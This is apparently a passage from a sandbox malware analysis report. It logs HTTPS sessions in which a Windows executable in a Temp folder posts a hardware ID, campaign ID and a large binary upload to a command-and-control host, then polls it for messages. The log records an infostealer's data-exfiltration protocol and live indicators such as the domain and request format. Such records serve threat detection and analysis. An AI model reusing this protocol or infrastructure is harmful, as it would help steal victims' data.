{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3F18nBn15e0radx7ud1IzVCvTN%2Fy8UWLrLnRWgW2SpoJuUaJReS01cz600xUt7oQCUEBY%2BIkaar9qdi4ek0kO4rbrWuq5MlCeEzIEVe0LGteDNUk8UEPtAHZw6flC2aDsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c472e0c6919cf-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2065&min_rtt=1869&rtt_var=841&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2266&delivery_rate=1562332&cwnd=252&unsent_bytes=0&cid=e992bb7a1811c796&ts=783&x=0"
2024-12-22 01:18:28 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	50162	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:31 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U1Z9T4NTZDBJS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20407 Host: discokeyus.lat
2024-12-22 01:18:31 UTC	15331	OUT	Data Raw: 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 4a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 4a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 4a 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 55 31 5a 39 54 34 4e 54 5a 44 42 Data Ascii: --U1Z9T4NTZDBJSContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--U1Z9T4NTZDBJSContent-Disposition: form-data; name="pid"3--U1Z9T4NTZDBJSContent-Disposition: form-data; name="lid"PsFKDg--pablo--U1Z9T4NTZDB
2024-12-22 01:18:31 UTC	5076	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2024-12-22 01:18:32 UTC	1136	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=n7dq3r8g2pa651648usgnc3ps4; expires=Wed, 16 Apr 2025 19:05:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKlGPCzok22VjbobCMloTpeGV5TOPH6bPcsw%2F25qa9Db6UxqWXLlrtgPM4PcqsTsc8p5AXFjJrL%2By3qQ3R%2BovsWhX72hx%2FA4Zb%2Fqb3%2BNSywKt3xeTEgTlbiQkAv0Qg735w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c4746087943d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1711&rtt_var=649&sent=16&recv=23&lost=0&retrans=0&sent_bytes=2832&recv_bytes=21362&delivery_rate=1678160&cwnd=241&unsent_bytes=0&cid=15628eb7148af287&ts=1029&x=0"
2024-12-22 01:18:32 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	50168	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:35 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=NIKTZ1E7HKB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 549819 Host: discokeyus.lat
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 4e 49 4b 54 5a 31 45 37 48 4b 42 0d 0a 43 6f 6e 74 Data Ascii: --NIKTZ1E7HKBContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--NIKTZ1E7HKBContent-Disposition: form-data; name="pid"1--NIKTZ1E7HKBContent-Disposition: form-data; name="lid"PsFKDg--pablo--NIKTZ1E7HKBCont
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: f1 83 a4 36 7e ea 3a c6 c4 89 ee 65 1b 3f 30 f9 14 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf Data Ascii: 6~:e?08NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: ef 31 cd d2 21 03 79 3e 56 72 52 97 96 5a 27 52 ea 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed Data Ascii: 1!y>VrRZ'R%0Zo[TqeuJ`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/KvtQ!3K4+EVh}8%tGJ:Ky.!,.v=0m
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: 94 34 a6 19 bd bc f5 2c 96 2a c6 2e bb b9 9b 1e 65 fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72 Data Ascii: 4,*.eOhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim\|quzqZ1&r
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: 28 07 51 96 c2 a4 9e 71 d0 ff 8b 0a 97 e9 cb f3 5e da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13 Data Ascii: (Qq^4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: a4 66 2a c7 fd 48 d4 0d 26 c5 91 be 3d 8c 7a 7e 58 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93 Data Ascii: fH&=z~XV86E\|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;;f[ 8$oaq"^~kn
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: ea f4 f6 f9 6f 37 aa 49 e9 ca 8a 7f da 45 1c 01 86 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71 Data Ascii: o7IEMv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: 05 21 25 41 c6 8a 6d c4 a3 83 c3 f9 8b 06 36 bd d9 c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2 Data Ascii: !%Am6?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=\|XuvD7YPFOK<OX0/~h- Gy7e`9:y\|:pbl
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: 19 c0 69 3b fa 01 59 dc 39 d4 2e 43 54 87 7e e4 8f 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9 Data Ascii: i;Y9.CT~w['@+FX3B?tb7Ikf[%&B\|@Pd?i>j,}up#KEF\#t63Yc+O\|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~M
2024-12-22 01:18:35 UTC	15331	OUT	Data Raw: 35 07 f5 4c be 48 e7 91 93 11 f4 97 37 25 27 4c 2d 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd Data Ascii: 5LH7%'L-?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{
2024-12-22 01:18:39 UTC	1131	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=05do9pgmrs8dacoiojj3saond0; expires=Wed, 16 Apr 2025 19:05:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FdcZMymmeJZhYv35y52W9TBlSuU87D2yKD2Qx5eUBx30oiGvVmjlByxGwwG0TpFvACVbCf6hs144rSsqQFlCSPZEifO0g4gBdXV38A4AgUoIzP%2B0OQ0gsFfBgrnF4IuVbQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c475f9c114364-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1765&rtt_var=679&sent=328&recv=572&lost=0&retrans=0&sent_bytes=2831&recv_bytes=552291&delivery_rate=1654390&cwnd=206&unsent_bytes=0&cid=09893c6d11ca1e3f&ts=4241&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	50169	104.21.21.99	443	348	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:35 UTC	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=2HJM9ZLTZOA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1331 Host: discokeyus.lat
2024-12-22 01:18:35 UTC	1331	OUT	Data Raw: 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 32 48 4a 4d 39 5a 4c 54 5a 4f 41 0d 0a 43 6f 6e 74 Data Ascii: --2HJM9ZLTZOAContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--2HJM9ZLTZOAContent-Disposition: form-data; name="pid"1--2HJM9ZLTZOAContent-Disposition: form-data; name="lid"PsFKDg--pablo--2HJM9ZLTZOACont
2024-12-22 01:18:36 UTC	1130	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gp3bic8e4rfkdk9el3icnq7c07; expires=Wed, 16 Apr 2025 19:05:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S5REP1dnsgzMV7g7yssN%2BO1lY6c4sUrYN3csvwwEf1xDQXRFkUFfdYw%2FLE4xMgdADzbYVUWvELdHvL%2Brp%2FteX0UBRyLbDZppM4wXd4Y5OxX%2FlsFFABCrpBNNums7SFU99w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47618f120f98-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1553&rtt_var=590&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2239&delivery_rate=1880231&cwnd=182&unsent_bytes=0&cid=7316d7d5027c4907&ts=775&x=0"
2024-12-22 01:18:36 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-22 01:18:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	50174	104.21.21.99	443	7012	C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-22 01:18:40 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 82 Host: discokeyus.lat
2024-12-22 01:18:40 UTC	82	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d 26 68 77 69 64 3d 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 Data Ascii: act=get_message&ver=4.0&lid=PsFKDg--pablo&j=&hwid=F14195A540BC0B98AC8923850305D13E
2024-12-22 01:18:41 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 22 Dec 2024 01:18:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s01gg5ffdbudbknfvmsbc9n8rs; expires=Wed, 16 Apr 2025 19:05:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=674dLbe0Y0ID4CeHq%2BLYJo60ikvbS2nEboDN6BEwUt7kS2t8m%2B3EFV3qgpfYk1vW6b9fP0MjMKf4KgJx%2BB0WeXITAINxbCiR%2FA%2BjpgUGXkzfBm0R6tcR8yRjX8dWer9j2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5c47832b9e7298-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1968&rtt_var=749&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=980&delivery_rate=1451292&cwnd=173&unsent_bytes=0&cid=1372b7458dca7e90&ts=792&x=0"
